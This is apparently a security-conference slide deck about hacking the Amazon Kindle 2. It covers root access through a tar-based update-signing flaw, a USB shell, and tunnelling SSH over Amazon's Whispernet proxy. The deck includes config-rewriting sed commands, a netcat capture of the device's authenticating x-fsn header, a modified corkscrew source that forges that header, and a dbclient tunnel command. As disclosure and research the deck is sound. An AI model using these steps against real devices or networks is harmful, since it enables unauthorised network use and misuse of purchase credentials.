School of Computer and Security Science

Edith Cowan University

Hooray for Reading The Kindle and You

Peter Hannay

p.hannay@ecu.edu.au

http://openduck.com

School of Computer and Security Science

Edith Cowan University

The Kindle

• Capabilities– Whispernet– Commerce– Information Gathering

• Update Security

• Getting a Shell

• Tunnelling

School of Computer and Security Science

Edith Cowan University

Capabilities

• Reads books

• Various versions

• Arm6 device, runs linux

School of Computer and Security Science

Edith Cowan University

The Kindle

• Capabilities– Whispernet– Commerce– Information Gathering

• Update Security

• Getting a Shell

• Tunnelling

School of Computer and Security Science

Edith Cowan University

Whispernet• International roaming cellular network• Service provided by AT&T and Sprint (and

international partners)• Access determined by home location, not

current location• AT&T

– VPN to kindleatt1.amazon.com

• Sprint– Custom, no VPN, tunnel opens after sending some

AT commands

School of Computer and Security Science

Edith Cowan University

Whispernet

• Extremely restrictive network

• You can speak to three hosts– fints-g7g.amazon.com (proxy)– 207.171.165.149 (dns)– 207.171.165.150 (dns)• DNS servers drop any request that isn’t for fints-

g7g.amazon.com

School of Computer and Security Science

Edith Cowan University

The Kindle

• Capabilities– Whispernet– Commerce– Information Gathering

• Update Security

• Getting a Shell

• Tunnelling

School of Computer and Security Science

Edith Cowan University

Commerce

• You can buy books (depending on your home region & current location)

• Create new amazon account with address in desired region, use gift cards, buy books on device

• Create new amazon account with address in desired region, use gift cards, buy books on web (with region correct proxy) and manually transfer to device

School of Computer and Security Science

Edith Cowan University

The Kindle

• Capabilities– Whispernet– Commerce– Information Gathering

• Update Security

• Getting a Shell

• Tunnelling

School of Computer and Security Science

Edith Cowan University

Information Gathering

• AGPS is used to determine the current location of every device

• These devices report home every now and again

• This is used to control content distrobution

School of Computer and Security Science

Edith Cowan University

The Kindle

• Capabilities– Whispernet– Commerce– Information Gathering

• Update Security

• Getting a Shell

• Tunnelling

School of Computer and Security Science

Edith Cowan University

Update Security

• Updates must be signed

• Uses internal RSA key for reference

• Updates are basically tar files

• It decompresses these tar files prior to sig check

• It just runs tar on them, as root

• So if we specify the full path of the file we want to write?

School of Computer and Security Science

Edith Cowan University

Update Security

• Yeah it works.

• This is used to add an additional RSA key for authenticating updates

• Igor Skochinsky & Jean-Yves Avenard have written libfreekindle and the firmware update tool that use this principal.

• http://www.avenard.org/kindle2/ awesome

• It works well.

School of Computer and Security Science

Edith Cowan University

The Kindle

• Capabilities– Whispernet– Commerce– Information Gathering

• Update Security

• Getting a Shell

• Tunnelling

School of Computer and Security Science

Edith Cowan University

Getting a shell

• So, we need a shell on the device.

• There is a usbnet package that has been created which configures the usb port as an ethernet device.

• Install package (drop onto device and press the update button)

• Type ;DebugOn

• Type `usbNetwork

School of Computer and Security Science

Edith Cowan University

Getting a Shell

• Attach cable

• Set local IP to something in the 192.168.2.0/24 subnet

• SSH/telnet to 192.168.2.2

• All good.

School of Computer and Security Science

Edith Cowan University

The Kindle

• Capabilities– Whispernet– Commerce– Information Gathering

• Update Security

• Getting a Shell

• Tunnelling

School of Computer and Security Science

Edith Cowan University

Getting a Shell• There is a value passed to the proxy to

identify your device.• This value is inserted prior to initial shipment• This is the only authentication mechanism,

this value lets you buy things.• A kindle can buy books from amazon,

without any authentication other than this value.

• This worries me.

School of Computer and Security Science

Edith Cowan University

Whispernet Tunneling

• We need to find out super secret value… but how.. (Yeah I couldn’t figure out where its stored, but that’s ok).

/opt/amazon/ebook/config/framework.mario.conf

/opt/amazon/ebook/config/browser_prefs

/opt/amazon/ebook/config/framework.fiona.conf

HTTP_PROXY_HOST : fints-g7g.amazon.com

• Lets change that to localhost

School of Computer and Security Science

Edith Cowan University

Whispernet Tunnelingsed -i 's/fints-g7g.amazon.com/127.0.0.1/g' framework.mario.conf

sed -i 's/fints-g7g.amazon.com/127.0.0.1/g' browser_prefs

sed -i 's/fints-g7g.amazon.com/127.0.0.1/g' framework.fiona.conf

root@kindle bin]# ./netcat -l -p 80

GET http://en.m.wikipedia.org/ HTTP/1.1

Accept: image/png, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

Host: en.m.wikipedia.org

User-Agent: Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.3 (screen 600x800; rotate)

Proxy-Connection: Keep-Alive

Accept-Encoding: deflate, gzip

x-fsn: BIG MAGIC VALUE GOES HERE

x-appNamespace: WEB_BROWSER

x-appId: Kindle_2.2

School of Computer and Security Science

Edith Cowan University

Compiling Stuff

• Kindle doesn’t come with netcat, dig, corkscrew, a compiler and a lot of other things.

• cs2007q3-glibc2.5-arm6 toolchain works

School of Computer and Security Science

Edith Cowan University

Whispernet Tunneling

• So we modify corkscrewstrncpy(uri, "CONNECT ", sizeof(uri));

strncat(uri, desthost, sizeof(uri) - strlen(uri) - 1);

strncat(uri, ":", sizeof(uri) - strlen(uri) - 1);

strncat(uri, destport, sizeof(uri) - strlen(uri) - 1);

strncat(uri, " HTTP/1.1", sizeof(uri) - strlen(uri) - 1);

strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);

strncat(uri, "Host: ", sizeof(uri) - strlen(uri) - 1);

strncat(uri, desthost, sizeof(uri) - strlen(uri) - 1);

strncat(uri, ":", sizeof(uri) - strlen(uri) - 1);

strncat(uri, destport, sizeof(uri) - strlen(uri) - 1);

strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);

strncat(uri, "User-Agent: Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.1 (screen 600x800)", sizeof(uri) - strlen(uri) - 1);

strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);

strncat(uri, "x-fsn: \”BIG MAGIC VALUE GOES HERE\"", sizeof(uri) - strlen(uri) - 1);

strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);

School of Computer and Security Science

Edith Cowan University

Whispernet Tunneling

• Have to kill a couple of daemons

• netwatchd and watchdogd

• These things like to close connections and the like.

/etc/init.d/netwatchd stop

/etc init.d/watchdogd stop

School of Computer and Security Science

Edith Cowan University

Whispernet Tunneling

• So now we open up a tunnel./dbclient kronicd@IP -K 5 -J "corkscrew fints-g7g.amazon.com 80 IP 443" -g -L 31337:IP:22

kronicd@IP's password:

Linux boxen 2.6.32-5-486 #1 Thu Aug 12 12:59:56 UTC 2010 i586

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Sun Nov 21 08:57:55 2010 from IP

kronicd@boxen:~$ exit

logout

School of Computer and Security Science

Edith Cowan University

Questions

??

?

?

?

??

?